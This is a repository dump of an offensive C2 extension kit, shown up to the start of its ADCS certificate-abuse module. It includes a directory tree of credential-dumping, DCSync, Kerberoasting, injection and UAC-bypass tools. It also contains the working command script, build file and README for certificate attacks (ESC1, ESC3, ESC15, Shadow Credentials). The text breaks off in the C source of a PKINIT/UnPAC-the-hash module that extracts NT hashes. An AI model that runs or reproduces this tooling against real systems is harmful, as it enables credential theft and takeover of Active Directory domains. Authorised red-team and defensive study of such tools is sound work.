Copy disabled (too large)
Download .txt
Showing preview only (10,170K chars total). Download the full file to get everything.
Repository: Adaptix-Framework/Extension-Kit
Branch: main
Commit: 9413caf85fd8
Files: 444
Total size: 9.6 MB
Directory structure:
gitextract_l_k0_oet/
├── .gitignore
├── AD-BOF/
│ ├── ADCS-BOF/
│ │ ├── ADCS.axs
│ │ ├── Makefile
│ │ ├── README.md
│ │ └── src/
│ │ ├── auth/
│ │ │ └── certi_auth.c
│ │ ├── enum/
│ │ │ ├── adcs_enum_com2.c
│ │ │ ├── adcs_enum_com2.h
│ │ │ ├── base.c
│ │ │ ├── certenroll.h
│ │ │ └── entry.c
│ │ ├── request/
│ │ │ ├── CertCli.h
│ │ │ ├── CertPol.h
│ │ │ ├── adcs_request.c
│ │ │ ├── adcs_request.h
│ │ │ ├── base.c
│ │ │ ├── certca.h
│ │ │ ├── certenroll.h
│ │ │ └── entry.c
│ │ ├── request_on_behalf/
│ │ │ ├── CertCli.h
│ │ │ ├── CertPol.h
│ │ │ ├── base.c
│ │ │ ├── certenroll.h
│ │ │ └── entry.c
│ │ └── shadow/
│ │ └── certi_shadow.c
│ ├── CMakeLists.txt
│ ├── DCSync-BOF/
│ │ ├── LICENSE
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── _include/
│ │ │ ├── beacon.h
│ │ │ ├── dcsync.h
│ │ │ └── ldap_common.h
│ │ ├── drsuapi/
│ │ │ ├── ms-drsr-custom.c
│ │ │ └── ms-drsr.h
│ │ ├── src/
│ │ │ ├── dcsync-all.c
│ │ │ └── dcsync-single.c
│ │ └── util/
│ │ ├── ldap_common.c
│ │ ├── ldap_syncall.c
│ │ └── rpc-adapter.c
│ ├── Kerbeus-BOF/
│ │ ├── CMakeLists.txt
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── _include/
│ │ │ ├── asn_convert.c
│ │ │ ├── asn_decode.c
│ │ │ ├── asn_encode.c
│ │ │ ├── beacon.h
│ │ │ ├── connection.c
│ │ │ ├── crypt_b64.c
│ │ │ ├── crypt_checksum.c
│ │ │ ├── crypt_dec.c
│ │ │ ├── crypt_enc.c
│ │ │ ├── crypt_key.c
│ │ │ ├── functions.c
│ │ │ └── kerb_struct.h
│ │ ├── asktgs/
│ │ │ └── asktgs.c
│ │ ├── asktgt/
│ │ │ └── asktgt.c
│ │ ├── asreproasting/
│ │ │ └── asreproasting.c
│ │ ├── changepw/
│ │ │ └── changepw.c
│ │ ├── describe/
│ │ │ └── describe.c
│ │ ├── hash/
│ │ │ └── hash.c
│ │ ├── kerberoasting/
│ │ │ └── kerberoasting.c
│ │ ├── kerbeus.axs
│ │ ├── klist/
│ │ │ └── klist.c
│ │ ├── ptt/
│ │ │ └── ptt.c
│ │ ├── purge/
│ │ │ └── purge.c
│ │ ├── renew/
│ │ │ └── renew.c
│ │ ├── s4u/
│ │ │ ├── cross_s4u.c
│ │ │ └── s4u.c
│ │ └── tgtdeleg/
│ │ └── tgtdeleg.c
│ ├── LDAP-BOF/
│ │ ├── CMakeLists.txt
│ │ ├── LDAP.axs
│ │ ├── LICENSE
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── _include/
│ │ │ ├── acl_common.h
│ │ │ ├── beacon.h
│ │ │ └── ldap_common.h
│ │ └── src/
│ │ ├── add/
│ │ │ ├── add-ace.c
│ │ │ ├── add-attribute.c
│ │ │ ├── add-computer.c
│ │ │ ├── add-delegation.c
│ │ │ ├── add-group.c
│ │ │ ├── add-groupmember.c
│ │ │ ├── add-ou.c
│ │ │ ├── add-rbcd.c
│ │ │ ├── add-sidhistory.c
│ │ │ ├── add-spn.c
│ │ │ ├── add-uac.c
│ │ │ └── add-user.c
│ │ ├── common/
│ │ │ ├── acl_common.c
│ │ │ └── ldap_common.c
│ │ ├── get/
│ │ │ ├── get-acl.c
│ │ │ ├── get-attribute.c
│ │ │ ├── get-computers.c
│ │ │ ├── get-delegation.c
│ │ │ ├── get-domaininfo.c
│ │ │ ├── get-groupmembers.c
│ │ │ ├── get-groups.c
│ │ │ ├── get-maq.c
│ │ │ ├── get-object.c
│ │ │ ├── get-rbcd.c
│ │ │ ├── get-spn.c
│ │ │ ├── get-uac.c
│ │ │ ├── get-usergroups.c
│ │ │ ├── get-users.c
│ │ │ └── get-writable.c
│ │ ├── move/
│ │ │ └── move-object.c
│ │ ├── remove/
│ │ │ ├── remove-ace.c
│ │ │ ├── remove-attribute.c
│ │ │ ├── remove-delegation.c
│ │ │ ├── remove-groupmember.c
│ │ │ ├── remove-object.c
│ │ │ ├── remove-rbcd.c
│ │ │ ├── remove-spn.c
│ │ │ └── remove-uac.c
│ │ └── set/
│ │ ├── set-attribute.c
│ │ ├── set-delegation.c
│ │ ├── set-owner.c
│ │ ├── set-password.c
│ │ ├── set-spn.c
│ │ └── set-uac.c
│ ├── Makefile
│ ├── README.md
│ ├── RelayInformer/
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── RelayInformer.axs
│ │ ├── common/
│ │ │ ├── base.c
│ │ │ ├── beacon.h
│ │ │ ├── bofdefs.h
│ │ │ ├── hwbp.c
│ │ │ └── sql.c
│ │ ├── relay-informer-http/
│ │ │ └── entry.c
│ │ ├── relay-informer-ldap/
│ │ │ └── entry.c
│ │ ├── relay-informer-mssql/
│ │ │ └── entry.c
│ │ └── relay-informer-smb/
│ │ └── entry.c
│ ├── SQL-BOF/
│ │ ├── CMakeLists.txt
│ │ ├── LICENSE
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── SQL.axs
│ │ └── src/
│ │ ├── SQL/
│ │ │ ├── 1434udp/
│ │ │ │ └── entry.c
│ │ │ ├── adsi/
│ │ │ │ ├── entry.c
│ │ │ │ └── ldapserver.h
│ │ │ ├── agentcmd/
│ │ │ │ └── entry.c
│ │ │ ├── agentstatus/
│ │ │ │ └── entry.c
│ │ │ ├── checkrpc/
│ │ │ │ └── entry.c
│ │ │ ├── clr/
│ │ │ │ └── entry.c
│ │ │ ├── columns/
│ │ │ │ └── entry.c
│ │ │ ├── databases/
│ │ │ │ └── entry.c
│ │ │ ├── impersonate/
│ │ │ │ └── entry.c
│ │ │ ├── info/
│ │ │ │ └── entry.c
│ │ │ ├── links/
│ │ │ │ └── entry.c
│ │ │ ├── olecmd/
│ │ │ │ └── entry.c
│ │ │ ├── query/
│ │ │ │ └── entry.c
│ │ │ ├── rows/
│ │ │ │ └── entry.c
│ │ │ ├── search/
│ │ │ │ └── entry.c
│ │ │ ├── smb/
│ │ │ │ └── entry.c
│ │ │ ├── tables/
│ │ │ │ └── entry.c
│ │ │ ├── togglemodule/
│ │ │ │ └── entry.c
│ │ │ ├── users/
│ │ │ │ └── entry.c
│ │ │ ├── whoami/
│ │ │ │ └── entry.c
│ │ │ └── xpcmd/
│ │ │ └── entry.c
│ │ └── common/
│ │ ├── base.c
│ │ ├── beacon.h
│ │ ├── bofdefs.h
│ │ ├── sql.c
│ │ ├── sql_agent.c
│ │ ├── sql_clr.c
│ │ └── sql_modules.c
│ ├── WebDAVClient/
│ │ ├── EnableWebDAVClient.c
│ │ ├── LICENSE
│ │ ├── StatusWebDAVClient.c
│ │ └── beacon.h
│ ├── ad-services.axs
│ ├── ad.axs
│ ├── adwssearch/
│ │ ├── adws_parser.h
│ │ ├── adws_search.c
│ │ ├── nbfse.h
│ │ ├── nmf.h
│ │ └── nns.h
│ ├── badtakeover/
│ │ └── BadTakeover.c
│ ├── ldapsearch/
│ │ ├── base.c
│ │ └── ldapsearch.c
│ └── readlaps/
│ ├── base.c
│ └── readlaps.c
├── CMakeLists.txt
├── Creds-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── UnderlayCopy/
│ │ ├── README.md
│ │ ├── entry.c
│ │ └── underlaycopy.h
│ ├── askcreds/
│ │ ├── askcreds.c
│ │ └── askcreds.h
│ ├── cookie-monster/
│ │ ├── LICENSE
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── adaptix.h
│ │ ├── beacon.h
│ │ ├── cookie-monster-bof.c
│ │ ├── cookie-monster-bof.h
│ │ ├── cookie-monster.axs
│ │ ├── decrypt.py
│ │ └── requirements.txt
│ ├── creds.axs
│ ├── get-netntlm/
│ │ └── get-netntlm.c
│ ├── hashdump/
│ │ ├── hashdump.c
│ │ └── hive_parser.c
│ ├── lsadump/
│ │ ├── cache.c
│ │ ├── include/
│ │ │ ├── cache.h
│ │ │ ├── lsadump.h
│ │ │ ├── sam.h
│ │ │ └── secrets.h
│ │ ├── lsadump_helper.c
│ │ ├── sam.c
│ │ └── secrets.c
│ └── nanodump/
│ ├── LICENSE
│ ├── Makefile
│ ├── README.md
│ ├── include/
│ │ ├── adaptix.h
│ │ ├── beacon.h
│ │ ├── delete_file.h
│ │ ├── dinvoke.h
│ │ ├── entry.h
│ │ ├── handle.h
│ │ ├── hw_breakpoint.h
│ │ ├── impersonate.h
│ │ ├── malseclogon.h
│ │ ├── modules.h
│ │ ├── nanodump.h
│ │ ├── nanodump_ppl_dump_dll.x64.h
│ │ ├── nanodump_ppl_dump_dll.x86.h
│ │ ├── nanodump_ppl_medic_dll.x64.h
│ │ ├── nanodump_ssp_dll.x64.h
│ │ ├── nanodump_ssp_dll.x86.h
│ │ ├── ntdefs.h
│ │ ├── output.h
│ │ ├── pipe.h
│ │ ├── ppl/
│ │ │ ├── cleanup.h
│ │ │ ├── ppl.h
│ │ │ ├── ppl_dump.h
│ │ │ ├── ppl_medic.h
│ │ │ ├── ppl_medic_client.h
│ │ │ ├── ppl_medic_dll.h
│ │ │ └── ppl_utils.h
│ │ ├── shtinkering.h
│ │ ├── spoof_callstack.h
│ │ ├── ssp/
│ │ │ ├── ssp.h
│ │ │ └── ssp_utils.h
│ │ ├── ssp.h
│ │ ├── syscalls.h
│ │ ├── token_priv.h
│ │ ├── utils.h
│ │ └── werfault.h
│ ├── nanodump.axs
│ ├── scripts/
│ │ ├── randomize_sw2_seed.py
│ │ └── restore_signature
│ └── source/
│ ├── bin2c.c
│ ├── delete_file.c
│ ├── dinvoke.c
│ ├── entry.c
│ ├── handle.c
│ ├── hw_breakpoint-asm.asm
│ ├── hw_breakpoint.c
│ ├── impersonate.c
│ ├── malseclogon.c
│ ├── modules.c
│ ├── nanodump.c
│ ├── output.c
│ ├── pipe.c
│ ├── ppl/
│ │ ├── cleanup.c
│ │ ├── ppl.c
│ │ ├── ppl_dump.c
│ │ ├── ppl_medic.c
│ │ ├── ppl_medic_client.c
│ │ ├── ppl_medic_dll.c
│ │ └── ppl_utils.c
│ ├── restore_signature.c
│ ├── shtinkering.c
│ ├── spoof_callstack-asm.asm
│ ├── spoof_callstack.c
│ ├── ssp/
│ │ ├── ssp.c
│ │ └── ssp_utils.c
│ ├── syscalls-asm.asm
│ ├── syscalls.c
│ ├── token_priv.c
│ ├── utils.c
│ └── werfault.c
├── Dockerfile
├── Elevation-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── elevate.axs
│ ├── getsystem_token/
│ │ └── getsystem_token.c
│ ├── potato-dcom/
│ │ ├── DCOMPotato.cpp
│ │ └── bofdefs.h
│ ├── printspoofer/
│ │ └── printspoofer.c
│ ├── uac_regshellcmd/
│ │ └── RegistryShellCommandBOF.c
│ └── uac_sspi/
│ └── SspiUacBypassBOF.cpp
├── Execution-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── No-Consolation/
│ │ ├── LICENSE
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── include/
│ │ │ ├── apisetlookup.h
│ │ │ ├── beacon.h
│ │ │ ├── bofdefs.h
│ │ │ ├── console.h
│ │ │ ├── entry.h
│ │ │ ├── hwbp.h
│ │ │ ├── loader.h
│ │ │ ├── output.h
│ │ │ ├── peb.h
│ │ │ ├── runner.h
│ │ │ └── utils.h
│ │ ├── no_consolation.axs
│ │ └── source/
│ │ ├── apisetlookup.c
│ │ ├── console.c
│ │ ├── entry.c
│ │ ├── hwbp.c
│ │ ├── loader.c
│ │ ├── peb.c
│ │ ├── runner.c
│ │ └── utils.c
│ ├── README.md
│ ├── execute-assembly/
│ │ ├── inlineExecute-Assembly.c
│ │ └── inlineExecute-Assembly.h
│ └── execution.axs
├── Injection-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── inject.axs
│ ├── inject_32to64/
│ │ └── inject_32to64.c
│ ├── inject_cfg/
│ │ └── inject_cfg.c
│ ├── inject_poolparty/
│ │ ├── 1.h
│ │ ├── 2.h
│ │ ├── 3.h
│ │ ├── 4.h
│ │ ├── 5.h
│ │ ├── 6.h
│ │ ├── 7.h
│ │ ├── 8.h
│ │ ├── PoolParty.h
│ │ └── inject_poolparty.c
│ └── inject_sec/
│ ├── inject_sec.c
│ └── libc.h
├── LICENSE
├── LateralMovement-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── lateral.axs
│ ├── psexec/
│ │ └── psexec.c
│ ├── runas/
│ │ └── runas.c
│ ├── runas_sess_IHxExec/
│ │ ├── bofdefs.h
│ │ └── ihxexec.c
│ ├── scshell/
│ │ └── scshell.c
│ ├── token_make/
│ │ └── token_make.c
│ ├── token_steal/
│ │ └── token_steal.c
│ └── winrm-client/
│ └── winrm.cpp
├── Makefile
├── Postex-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── SauronEyeBOF/
│ │ ├── entry.c
│ │ └── sauroneye.h
│ ├── ScreenshotBOF/
│ │ └── entry.c
│ ├── firewallrule/
│ │ ├── addfirewallrule.c
│ │ └── firewallrule.h
│ └── postex.axs
├── Process-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── findobjects/
│ │ ├── FindModule.c
│ │ ├── FindObjects.h
│ │ ├── FindProcHandle.c
│ │ ├── Syscalls-WoW64.h
│ │ └── Syscalls.h
│ ├── process/
│ │ ├── Syscalls-WoW64.h
│ │ ├── Syscalls.h
│ │ ├── base.c
│ │ └── psc.c
│ ├── process.axs
│ └── procfreeze/
│ └── procfreeze.c
├── README.md
├── SAL-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── arp/
│ │ ├── arp.c
│ │ └── base.c
│ ├── cacls/
│ │ ├── base.c
│ │ ├── cacls.c
│ │ └── defines.h
│ ├── dir/
│ │ ├── base.c
│ │ ├── dir.c
│ │ └── queue.c
│ ├── env/
│ │ ├── base.c
│ │ └── env.c
│ ├── ipconfig/
│ │ ├── base.c
│ │ └── ipconfig.c
│ ├── listdns/
│ │ ├── base.c
│ │ └── listdns.c
│ ├── netstat/
│ │ ├── base.c
│ │ └── netstat.c
│ ├── nslookup/
│ │ ├── base.c
│ │ └── nslookup.c
│ ├── privcheck/
│ │ ├── alwaysinstallelevated.c
│ │ ├── autologon.c
│ │ ├── credentialmanager.c
│ │ ├── download_vulnerable_driver_list.py
│ │ ├── hijackablepath.c
│ │ ├── modifiableautorun.c
│ │ ├── modifiablesvc.c
│ │ ├── privcheck_all.c
│ │ ├── pshistory.c
│ │ ├── tokenprivileges.c
│ │ ├── uacstatus.c
│ │ ├── unattendfiles.c
│ │ ├── unquotedsvcpath.c
│ │ ├── vulndrivers.h
│ │ └── vulnerabledrivers.c
│ ├── routeprint/
│ │ ├── base.c
│ │ └── routeprint.c
│ ├── sal.axs
│ ├── uptime/
│ │ ├── base.c
│ │ └── uptime.c
│ ├── useridletime/
│ │ ├── base.c
│ │ └── useridletime.c
│ └── whoami/
│ ├── base.c
│ └── whoami.c
├── SAR-BOF/
│ ├── CMakeLists.txt
│ ├── Makefile
│ ├── README.md
│ ├── nbtscan/
│ │ ├── nbtscan.c
│ │ └── nbtscan.h
│ ├── quser/
│ │ ├── base.c
│ │ └── quser.c
│ ├── sar.axs
│ ├── smartscan/
│ │ └── portscan_simple.c
│ └── taskhound/
│ └── taskhound.c
├── _include/
│ ├── adaptix.h
│ ├── beacon.h
│ └── bofdefs.h
├── add_agent.sh
├── docker-compose.yml
└── extension-kit.axs
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
_bin
.vscode
.cache/jb
SAL-BOF/vulndrivers.h
Creds-BOF/nanodump/dist/
# macOS
.DS_Store
**/.DS_Store
================================================
FILE: AD-BOF/ADCS-BOF/ADCS.axs
================================================
var metadata = {
name: "ADCS-BOF",
description: "Active Directory Certificate Services Exploitation BOFs"
};
let _cmd_certi_auth = ax.create_command("auth", "Authenticate with certificate (PKINIT + UnPAC-the-hash)", "certi auth --cert MIIMcAIBAzCCDCwG....");
_cmd_certi_auth.addArgFlagString("--cert", "cert", "Base64 encoded PFX certificate", "");
_cmd_certi_auth.addArgFlagFile("--pfx", "pfx", false, "PFX certificate file");
_cmd_certi_auth.addArgFlagString("--password", "password", "PFX password", "");
_cmd_certi_auth.addArgFlagString("--dc", "dc", "Domain Controller address (auto-detected if not specified)", "");
_cmd_certi_auth.addArgBool("--no-unpac", "Only get TGT, don't extract NT hash");
_cmd_certi_auth.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
let cert = parsed_json["cert"];
let pfx = parsed_json["pfx"];
let password = parsed_json["password"];
let dc = parsed_json["dc"];
let no_unpac = parsed_json["--no-unpac"] ? 1 : 0;
if (!cert && !pfx) { throw new Error("Either --cert or --pfx must be specified"); }
let bof_params = ax.bof_pack("cstr,cstr,cstr,bytes,short", [cert || "", password, dc, pfx || "", no_unpac]);
let bof_path = ax.script_dir() + "_bin/ADCS/certi_auth." + ax.arch(id) + ".o";
let message = "Task: Authenticate with certificate (PKINIT)";
ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});
var _cmd_certi_enum = ax.create_command("enum", "Enumerate CAs and templates in the AD", "certi enum");
_cmd_certi_enum.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
let bof_path = ax.script_dir() + "_bin/ADCS/certi_enum." + ax.arch(id) + ".o";
let message = "Task: Enumerate CAs and templates";
ax.execute_alias( id, cmdline, `execute bof "${bof_path}"`, message );
});
var _cmd_certi_req = ax.create_command("request", "Request an enrollment certificate", "certi req --ca cert.example.org\\example-CERT-CA --template vulnTemplate --subject CN=Administrator,CN=Users,DC=example,DC=org --altname CN=second_adm,CN=Users,DC=example,DC=org --alturl tag:microsoft.com,2022-09-14:sid:S-1-5-21-3006160104-3291460162-27467737-1123");
_cmd_certi_req.addArgFlagString( "--ca", "CA", true, "The certificate authority to use");
_cmd_certi_req.addArgFlagString("--template", "template", "The certificate type to request (else default for User/Machine)", "");
_cmd_certi_req.addArgFlagString("--subject", "subject", "The subject's distinguished name (else default for user/machine)", "");
_cmd_certi_req.addArgFlagString("--altname", "altname", "The alternate subject's distinguished name", "");
_cmd_certi_req.addArgFlagString("--alturl", "alturl", "SAN URL entry, can be used to specify the alternate subject's SID", "");
_cmd_certi_req.addArgFlagString("--pfx-password", "password", "PFX certificate password", "");
_cmd_certi_req.addArgBool("--install", "Install the certificate in current context?");
_cmd_certi_req.addArgBool("--machine", "Request a certificate for a machine instead of a user?");
_cmd_certi_req.addArgBool("--policy", "Adds App policy to allow client auth and Acting as a certificate agent (for ESC15)");
_cmd_certi_req.addArgBool("--dns", "Subject Altname given as a DNS name (else: Subject alt name given as UPN)");
_cmd_certi_req.addArgBool("--pem", "Output in PEM format instead of PFX");
_cmd_certi_req.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
let ca = "";
let template = parsed_json["template"];
let subject = parsed_json["subject"];
let altname = parsed_json["altname"];
let alturl = parsed_json["alturl"];
let password = parsed_json["password"];
let install = 0;
let machine = 0;
let policy = 0;
let dns = 0;
let pem = 0;
if("CA" in parsed_json) {
ca = parsed_json["CA"];
} else {
throw new Error("Need to provide the Certificate Authority at a minimum");
}
if(parsed_json["--install"]) { install = 1; }
if(parsed_json["--machine"]) { machine = 1; }
if(parsed_json["--policy"]) { policy = 1; }
if(parsed_json["--dns"]) { dns = 1; }
if(parsed_json["--pem"]) { pem = 1; }
let bof_params = ax.bof_pack("wstr,wstr,wstr,wstr,wstr,wstr,short,short,short,short,short", [ca, template, subject, altname, alturl, password, install, machine, policy, dns, pem ]);
let bof_path = ax.script_dir() + "_bin/ADCS/certi_req." + ax.arch(id) + ".o";
let message = "Task: Request certificate";
ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});
let _cmd_certi_req_onbehalf = ax.create_command("request_on_behalf", "Request certificate on behalf of another user (ESC3)", "certi request_on_behalf cert.example.org\\example-CERT-CA vulnTemplate Administrator /tmp/ea.pfx");
_cmd_certi_req_onbehalf.addArgFlagString( "--ca", "ca", true, "The certificate authority to use");
_cmd_certi_req_onbehalf.addArgFlagString("--template", "template", true, "Certificate template name");
_cmd_certi_req_onbehalf.addArgFlagString("--target", "target", true, "Target user (DOMAIN\\username)");
_cmd_certi_req_onbehalf.addArgFlagFile("--ea-pfx", "ea-pfx", true, "Enrollment Agent certificate (PFX file)");
_cmd_certi_req_onbehalf.addArgFlagString("--ea-password", "ea_password", "Enrollment Agent PFX password", "");
_cmd_certi_req_onbehalf.addArgFlagString("--pfx-password", "pfx_password", "Output PFX password", "");
_cmd_certi_req_onbehalf.addArgBool("--pem", "Output in PEM format instead of PFX");
_cmd_certi_req_onbehalf.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
let ca = parsed_json["ca"];
let template = parsed_json["template"];
let target = parsed_json["target"];
let ea_cert = parsed_json["ea-pfx"];
let ea_password = parsed_json["ea_password"];
let pfx_password = parsed_json["pfx_password"];
let pem = 0;
if(parsed_json["--pem"]) { pem = 1; }
let bof_params = ax.bof_pack("wstr,wstr,wstr,wstr,wstr,bytes,short", [ca, template, target, ea_password, pfx_password, ea_cert, pem]);
let bof_path = ax.script_dir() + "_bin/ADCS/certi_req_onbehalf." + ax.arch(id) + ".o";
let message = "Task: Request certificate on behalf of " + target;
ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});
let _cmd_certi_shadow = ax.create_command("shadow", "Shadow Credentials attack - write KeyCredentialLink and get certificate", "certi shadow --target Administrator");
_cmd_certi_shadow.addArgFlagString("--target", "target", true, "Target user (sAMAccountName)");
_cmd_certi_shadow.addArgFlagString("--domain", "domain", "Domain name (auto-detected if not specified)", "");
_cmd_certi_shadow.addArgBool("--no-write", "Don't write to AD, just generate certificate");
_cmd_certi_shadow.addArgBool("--clear", "Clear msDS-KeyCredentialLink (don't write new, only clear)");
_cmd_certi_shadow.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
let target = parsed_json["target"];
let domain = parsed_json["domain"];
let no_write = parsed_json["--no-write"] ? 1 : 0;
let clear = parsed_json["--clear"] ? 1 : 0;
let bof_params = ax.bof_pack("cstr,cstr,short,short", [target, domain, no_write, clear]);
let bof_path = ax.script_dir() + "_bin/ADCS/certi_shadow." + ax.arch(id) + ".o";
let message = clear ? "Task: Clear Shadow Credentials from " + target + "@" + domain
: "Task: Shadow Credentials attack on " + target + "@" + domain;
ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});
var cmd_certi = ax.create_command("certi", "ADCS BOF");
cmd_certi.addSubCommands([ _cmd_certi_auth, _cmd_certi_enum, _cmd_certi_req, _cmd_certi_req_onbehalf, _cmd_certi_shadow ]);
var group_adcs = ax.create_commands_group("ADCS-BOF", [cmd_certi]);
ax.register_commands_group(group_adcs, ["beacon", "gopher", "kharon"], ["windows"], []);
================================================
FILE: AD-BOF/ADCS-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../../_include -w -Wno-incompatible-pointer-types -Os -s -DBOF -c
all: bof
bof:
@(mkdir -p _bin/ADCS 2>/dev/null) && echo 'creating _bin/ADCS' || echo '_bin/ADCS exists'
@($(CC64) $(CFLAGS) src/enum/entry.c -o _bin/ADCS/certi_enum.x64.o && $(STRIP64) _bin/ADCS/certi_enum.x64.o) && echo '[+] enum' || echo '[!] enum'
@($(CC64) $(CFLAGS) src/request/entry.c -o _bin/ADCS/certi_req.x64.o && $(STRIP64) _bin/ADCS/certi_req.x64.o) && echo '[+] certi_req' || echo '[!] certi_req'
@($(CC64) $(CFLAGS) src/request_on_behalf/entry.c -o _bin/ADCS/certi_req_onbehalf.x64.o && $(STRIP64) _bin/ADCS/certi_req_onbehalf.x64.o) && echo '[+] certi_req_onbehalf' || echo '[!] certi_req_onbehalf'
@($(CC64) $(CFLAGS) src/auth/certi_auth.c -o _bin/ADCS/certi_auth.x64.o && $(STRIP64) _bin/ADCS/certi_auth.x64.o) && echo '[+] certi_auth' || echo '[!] certi_auth'
@($(CC64) $(CFLAGS) src/shadow/certi_shadow.c -o _bin/ADCS/certi_shadow.x64.o && $(STRIP64) _bin/ADCS/certi_shadow.x64.o) && echo '[+] certi_shadow' || echo '[!] certi_shadow'
clean:
@(rm -rf _bin)
================================================
FILE: AD-BOF/ADCS-BOF/README.md
================================================
# ADCS-BOF
A library of beacon object files to interact with ADCS servers and certificates.
## certi auth
Authenticate with certificate (PKINIT + UnPAC-the-hash)
```
certi auth <{--cert base64_cert} || {--pfx file.pfx}> [--password pfx_password] [--dc DC] [--no-unpac]
```
* `--cert` - Base64 encoded PFX certificate
* `--pfx` - PFX certificate file
* `--password` - PFX password
* `--dc` - Domain Controller address (auto-detected if not specified)
* `--no-unpac` - Only get TGT, don't extract NT hash
## certi enum
Enumerate CAs and templates in the AD
```
certi enum
```
## certi request
Request an enrollment certificate
```
certi req <--ca CA> [--template Template] [--subject CN] [--altname CN] [--alturl tag:microsoft.com,2022-09-14:sid:<SID>] [--install] [--machine] [--policy] [--dns] [--pfx-password password] [--pem]
```
* `--ca` - The certificate authority to use
* `--template` - The certificate type to request (else default for User/Machine)
* `--subject` - The subject's distinguished name (else default for user/machine)
* `--altname` - The alternate subject's distinguished name
* `--alturl` - SAN URL entry, can be used to specify the alternate subject's SID
* `--install` - Install the certificate in current context?
* `--pfx-password` - Output PFX password
* `--machine` - Request a certificate for a machine instead of a user?
* `--policy` - Adds App policy to allow client auth and Acting as a certificate agent (for ESC15)
* `--dns` - Subject Altname given as a DNS name (else: Subject alt name given as UPN).
* `--pem` - Output in PEM format instead of PFX
## certi request_on_behalf
Request certificate on behalf of another user (ESC3)
```
certi request_on_behalf --ca <ca> --template <template> --target <target> --ea-pfx <cert> [--ea-password password] [--pfx-password password] [--pem]
```
* `--ca` - The certificate authority to use
* `--template` - The certificate type to request (else default for User/Machine)
* `--target` - Target user (DOMAIN\\username)
* `--altname` - The alternate subject's distinguished name
* `--ea-pfx` - Enrollment Agent certificate (PFX file
* `--ea-password` - Enrollment Agent PFX password
* `--pfx-password` - Output PFX password
* `--pem` - Output in PEM format instead of PFX
## certi shadow
Shadow Credentials attack - write KeyCredentialLink and get certificate
```
certi shadow --target <account> [--clear] [--domain domain] [--no-write]
```
* `--target` - Target user (sAMAccountName)
* `--clear` - Clear msDS-KeyCredentialLink (don't write new, only clear)
* `--domain` - Domain name (auto-detected if not specified)
* `--no-write` - Don't write to AD, just generate certificate
## References
- [https://github.com/trustedsec/CS-Remote-OPs-BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF)
- [https://github.com/trustedsec/CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
- [https://github.com/RayRRT/ESC1-unPAC]
- [https://github.com/RayRRT/BOFs/tree/main/ShadowCreds-unPAC-BOF]
================================================
FILE: AD-BOF/ADCS-BOF/src/auth/certi_auth.c
================================================
#define WIN32_LEAN_AND_MEAN
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <wincrypt.h>
#include <winldap.h>
#include <dsgetdc.h>
#include <lm.h>
#include "beacon.h"
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_ERROR 0x0d
/* Missing COM type definitions for BOF mode */
typedef void* LPUNKNOWN;
typedef WCHAR OLECHAR;
typedef OLECHAR* LPOLESTR;
typedef OLECHAR* BSTR;
/* Kerberos Message Types */
#define KRB_AS_REQ 10
#define KRB_AS_REP 11
#define KRB_ERROR 30
/* PA-DATA Types */
#define PA_PK_AS_REQ 16
#define PA_PK_AS_REP 17
#define PA_PAC_CREDENTIALS 167
/* Encryption Types */
#define ETYPE_AES256_CTS_HMAC_SHA1 18
#define ETYPE_AES128_CTS_HMAC_SHA1 17
#define ETYPE_RC4_HMAC 23
/* Key Usage */
#define KRB_KEY_USAGE_AS_REP_ENCPART 3
#define KRB_KEY_USAGE_PAC_CREDENTIAL 16
/* Certificate Request */
#define CR_IN_BASE64 0x00000001
#define CR_IN_PKCS10 0x00000100
#define CR_OUT_BASE64 0x00000001
#define CR_DISP_INCOMPLETE 0
#define CR_DISP_ERROR 1
#define CR_DISP_DENIED 2
#define CR_DISP_ISSUED 3
#define CR_DISP_ISSUED_OUT_OF_BAND 4
#define CR_DISP_UNDER_SUBMISSION 5
#define CR_DISP_REVOKED 6
/* Base64 decoding flags - use ANY for flexibility with line breaks */
#ifndef CRYPT_STRING_BASE64_ANY
#define CRYPT_STRING_BASE64_ANY 0x00000006
#endif
/* MODP Group 2 - 1024 bit DH parameters (RFC 2409) */
static const BYTE DH_P_MODP2[] = {
0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
